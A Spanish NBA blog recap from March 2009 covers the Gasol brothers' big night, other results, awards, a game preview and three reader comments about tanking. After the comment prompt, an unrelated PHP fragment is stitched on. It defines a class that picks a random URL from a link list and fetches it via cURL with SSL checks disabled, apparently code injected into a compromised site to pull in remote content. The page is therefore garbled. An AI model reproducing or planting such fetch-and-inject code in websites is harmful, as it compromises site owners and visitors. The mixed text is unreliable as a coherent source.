La crónica (27/03/09)

28 de March de 2009 por TheDeerHunter

Por TheDeerHunter&Jabhito
Por TheDeerHunter&JabhitoJornada larga de viernes que, como ya avisábamos ayer contenía algo de chicha y bastante paja.

Lo mejor… la noche de los Gasol. 63 puntos entre ambos siendo la mejor noche que se les recuerda. Kobe dio el susto de la temporada y Pau tuvo que recoger los galones. Vaya si lo hizo, rozando el triple doble en una de sus mejores actuaciones de la temporada. Los Lakers aseguran el primer puesto del Oeste, aunque la sombra de un banquillo paupérrimo se cierne sobre ellos. Vaya partidito que se marcaron los Farmar-Vujacic-Walton-Powell… para echarlos a los leones.

Por su parte, Marc, dio una exhibición en Sacramento comiéndose vivo, entre otros, a Jason Thompson. Es matemático que el día que se tira más de 4 tiros el chaval destaca y su equipo lo disfruta. Lo malo es que esos días llegan tan de vez en vez. Uno de los defectos de la competición que precisamente el otro día denunciaba Nocioni. De los Kings poco que salvar… como mucho la decisión de retirar la camiseta de Divac. A alguno nos llegó a sacar de nuestras casillas en aquella época pero nadie puede negar lo gran jugador que fue y lo bien que se acopló a aquel juego de pase preciosista. Sin duda esa camiseta merece estar colgada en todo lo alto del ARCO Arena, donde antaño más resonaban los cencerros.

La sombra de la noche por parte de los españoles fue la actuación, otra vez más, renqueante de Calderón. A pesar de eso su equipo logró el récord de la temporada de victorias consecutivas… tres!!! Resumen de la triste temporada de los Raptors… y desde aquí me gustaría abrir la plataforma pro-descanso de Calderón el próximo verano. Tenemos otros bases que merecen una oportunidad como para repetir la cagada Garbajosa. Hagamos fuerza.

El mejor partido de la noche se jugó en Dallas. El partido de infarto con un buen saco de canastas. Actuación sensacional de Carmelo. Hubiera molado todavía más si alguno de los dos equipos hubiera estado en situación más crítica… pero está claro que deberíais habernos hecho caso en nuestra recomendación de ayer… y lo que es más importante, nosotros mismos tendríamos que haber hecho caso a nuestros propios consejos. Lástima.

En el otro partido que destacábamos Boston se llevó demasiado sobrado el choque en Atlanta. Incluso pudieron permitirse el lujo de dar descanso a Garnett. Curiosamente Glen “salchicha peleona” Davis recogió el testigo y se marcó un auténtico partidazo. También pudimos disfrutar del mejor partido de Marbury&Moore desde que llegaron a los Celtics.

Sin embargo, de poco les sirvió la victoria a los Celtics. Orlando se deshizo fácil de Milwaukee y Cleveland de unos Wolves que nos ponen cada vez más nerviosos. ¿Para qué haces el paripé sacando otra exótica alineación más?? Ni que sacando sus mejores galas hubieran podido aspirar a ganar en casa de los Cavs. Que asco, por dios. Lebron logra otro récord… el de victorias consecutivas para la franquicia.

Otro candidato que ganó fue San Antonio ante los Clippers… y encima Camby se les lesiona. Pufff…

Por último, dos sorpresas. El regalo de los Sixers a su ex Larry Brown, que todavía mantiene esperanzas de postemporada y la derrota de los Hornets en el Madison. Hacia tiempo que “franquicias” Posey no hacía ninguna de las suyas. Anoche se le ocurrió meterle un balonazo a un árbitro… qué chispa tiene el tío.

PREMIOS

MVP: Creo que no nos puede en general el chovinismo ni tampoco excesivamente la ÑBA. Anoche el partidazo de Melo fue espectacular con 43 puntos, 11 rebotes y lo que es más importante llevando a Denver a una importante victoria. Pero el partidazo de Gasol en New Jersey fue para quitarse el sombrero y como mínimo para comparttir premio con Melo… A estas alturas ya nadie debería discutir la categoria de Pau y que es uno de los mejores del mundo.

Rookie: Partidos interesantes de los Lee, Love, Lopez, Gordon o Thompson. Pero todos lejos del otro Gasol, Marc. A ver si la Tanqueta tiene suerte y Memphis es más competitivo cara al año que viene.

Sopresa: Para Glen Davis que suplió con mucho acierto a Garnett. 19 puntos y 12 rebotes y ya son varias las actuaciones destacadas de Davis este año. Menciones para Taylor en los Clippers, Hayes y sus triples en los Nets o Wright en los Hornets.

Decepción: Anda que se está jugando poco Philly, que va 6º casi empatado con los Heat… uno de ellos evitará a los cocos del Este y tendrá muchas más opciones de superar una ronda de Play Offs jugando contra los Hawks. En esas estaban los Sixers y en casa contra Bobcats, que de paso los hubieran mandado fuera de la lucha, van y palman. Premio para el mal partido de Andre Miller… extraño en él.

El mayor esfuerzo en vano: El de Kevin Martin que lo mismo se llevó una bronca en el vestuario por hacer lo posible por ganar el partido…

RAZONES PARA TRASNOCHAR

La noche de los sábados no da mucho de si en cuanto a partidazos, y menos a estas alturas con muchos equipos que casi no juegan a anda y otros que juegan a ganar la loteria del draft… Pero si hay cositas rescatables. Por la tarde tenemos uns Pacers@Bulls. Los de Chicago son 7º y están a la espera de ver cuanto se descuidan otros para ver dónde  pueden llegar. Luego, ya de madrgada hora española, comienzan los partidos por ir acalarando posiciones en el Oeste. Juegan Houston, Denver, Porland y el más interesante de la noche:

Suns@Jazz: Andan los Suns a 3 partidos de Dallas que con 10 por jugar son muchísimos… Yo creo que no llegan, pero desde luego si quieren mantener alguna opción esto pasa por ganar en Sant Lake City, cosa nada fácil. Los Jazz están en una lucha fraticida con los Nuggets y los Blazers por el liderato de la división. Porland y Denver lo tiene más fácil esta noche, por lo que una derrota les dejaría a 3 victorias del liderato que viendo lo que queda casi sería definitivo para ellos…

LA PREGUNTA DEL DÍA

Si fuerais aficionados de los Wolves, como los Heat el año pasado y otros en otras temporadas, ¿aprobariaís que vuestro equipo tirara partidos para tener más papeletas en el draft?

Comenta

3 comentarios a esta entrada

  1. Jabho dice:
    #1

    Vaya temporada de Pau… brutal.

    De todas formas los Lakers necesitan a Bynum porque en cuanto Pau descansa el agujero en la zona es de miedo. Eso hace que les recuperen diferencias y tal, porque se nota muchísimo su ausencia. Mbenga y Powell mu poquita cosa.

    A mi no me gustaría que mi equipo hiciera lo que hacen los Wolves o lo que hicieron los Heatel año pasado. Total, poniendo toda la carne en el asador igual ganan un par de partidos más que dejándose llevar y acaban con mejor imagen y mejores sensaciones.

      Citar

  2. TheDeerHunter dice:
    #2

    A mí me parece bastante repugnante el asunto… pero no vislumbro ningún otro mecanismo mejor que el que hay para evitarlo. Al fin y al cabo la jugada siempre te puede salir mal, como le salió a Memphis hace no mucho o, sin ir más lejos, que te haya tocado Beasley y sea una de las decepciones de la temporada.
    En cualquier caso, la jugada viene de lejos… todavía me acuerdo la que hizo San Antonio para pillar a Duncan aquel año, que estuvo a punto de costarles una investigación en toda regla…
    Quizás esa sería una de las posibles soluciones… que realmente se investigara en vez de amenazar pero, ¿cómo demuestras que un equipo se ha dejado perder adrede??

      Citar

  3. Miguel dice:
    #3

    Buen partido de los Gasols, no sé yo lo que haría con equipos como los Timberwolves, quizá con los partidos que amañen en un año, les cuenten como derrotas al siguiente.
    Bueno creo que os habeis dejado algo en las razones para trasnochar y aunque los Wizards a estas alturas de temporada les va dar igual hoy puede volver el Agente 0 espero que se marque un buen partido Gilbert y si puede ser que el año que viene tenga como compañero a Ricky.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>